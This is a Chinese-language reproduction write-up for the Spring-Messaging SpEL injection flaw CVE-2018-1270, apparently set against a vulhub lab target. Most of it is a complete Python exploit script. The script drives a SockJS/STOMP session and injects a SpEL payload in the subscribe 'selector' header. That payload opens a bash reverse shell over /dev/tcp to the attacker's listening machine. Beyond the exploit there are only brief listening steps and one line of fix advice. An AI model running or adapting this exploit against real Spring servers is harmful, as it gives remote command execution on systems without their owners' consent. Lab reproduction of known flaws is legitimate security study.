Spring-Messaging远程代码执行漏洞（CVE-2018-1270）

漏洞描述：

Spring框架中的 spring-messaging 模块提供了一种基于WebSocket的STOMP协议实现，STOMP消息代理在处理客户端消息时存在SpEL表达式注入漏洞，攻击者可以通过构造恶意的消息来实现远程代码执行。

复现过程：

1. 访问ip：port
2. 构造exp

#!/usr/bin/env python3

import requests

import random

import string

import time

import threading

import logging

import sys

import json

logging.basicConfig(stream=sys.stdout, level=logging.INFO)

def random_str(length):

    letters = string.ascii_lowercase + string.digits

    return ''.join(random.choice(letters) for c in range(length))

class SockJS(threading.Thread):

    def __init__(self, url, *args, **kwargs):

        super().__init__(*args, **kwargs)

        self.base = f'{url}/{random.randint(0, 1000)}/{random_str(8)}'

        self.daemon = True

        self.session = requests.session()

        self.session.headers = {

            'Referer': url,

            'User-Agent': 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)'

        }

        self.t = int(time.time()*1000)

    def run(self):

        url = f'{self.base}/htmlfile?c=_jp.vulhub'

        response = self.session.get(url, stream=True)

        for line in response.iter_lines():

            time.sleep(0.5)

     

    def send(self, command, headers, body=''):

        data = [command.upper(), '\n']

        data.append('\n'.join([f'{k}:{v}' for k, v in headers.items()]))

         

        data.append('\n\n')

        data.append(body)

        data.append('\x00')

        data = json.dumps([''.join(data)])

        response = self.session.post(f'{self.base}/xhr_send?t={self.t}', data=data)

        if response.status_code != 204:

            logging.info(f"send '{command}' data error.")

        else:

            logging.info(f"send '{command}' data success.")

    def __del__(self):

        self.session.close()

sockjs = SockJS('http://你的靶机IP:8080/gs-guide-websocket')

sockjs.start()

time.sleep(1)

sockjs.send('connect', {

    'accept-version': '1.1,1.0',

    'heart-beat': '10000,10000'

})

sockjs.send('subscribe', {

    'selector': 'T(java.lang.Runtime).getRuntime().exec(new String[]{"/bin/bash","-c","exec 5<>/dev/tcp/你的kaliIP/kali监听端口;cat <&5 | while read line; do $line 2>&5 >&5; done"})',

    'id': 'sub-0',

    'destination': '/topic/greetings'

})

data = json.dumps({'name': 'vulhub'})

sockjs.send('send', {

    'content-length': len(data),

    'destination': '/app/hello'

}, data)

3.kali监听

4.运行exp

5.成功监听

修复建议：

升级版本。